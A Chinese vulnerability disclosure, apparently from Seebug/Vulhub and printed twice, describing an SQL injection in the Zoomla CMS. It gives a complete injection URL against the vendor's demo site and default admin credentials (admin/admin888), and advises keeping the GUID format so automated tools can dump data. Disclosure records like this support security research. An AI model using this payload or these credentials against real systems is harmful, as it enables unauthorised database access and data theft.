VULHUB ™

### 简要描述： 只值1rank，给不给厂商随意，反正你的CMS那么不重视安全，无所谓了 ### 详细说明： 前台随意注册一个用户。或者你就用那个admin/admin888来。 登录后访问 http://demo.zoomla.cn/User/UserZone/GatherStrainManage/HuaTeeRevert.aspx?ID=00000000-0000-0000-0000-000000000000'%20and%20@@version%3E0--&Gid=1&menu=delete&HuaTeePicID=00000000-0000-0000-0000-000000000000 [<img src="https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png" alt="20140209113306.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png) ### 漏洞证明： 如果想要用工具暴数据的话，ID=00000000-0000-0000-0000-000000000000或者HuaTeePicID=00000000-0000-0000-0000-000000000000一定要按这个格式，否则可能工具会暴不出数据

### 简要描述： 只值1rank，给不给厂商随意，反正你的CMS那么不重视安全，无所谓了 ### 详细说明： 前台随意注册一个用户。或者你就用那个admin/admin888来。 登录后访问 http://demo.zoomla.cn/User/UserZone/GatherStrainManage/HuaTeeRevert.aspx?ID=00000000-0000-0000-0000-000000000000'%20and%20@@version%3E0--&Gid=1&menu=delete&HuaTeePicID=00000000-0000-0000-0000-000000000000 [<img src="https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png" alt="20140209113306.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/091133253a4caea1f16e880d176b4572785b69fb.png) ### 漏洞证明： 如果想要用工具暴数据的话，ID=00000000-0000-0000-0000-000000000000或者HuaTeePicID=00000000-0000-0000-0000-000000000000一定要按这个格式，否则可能工具会暴不出数据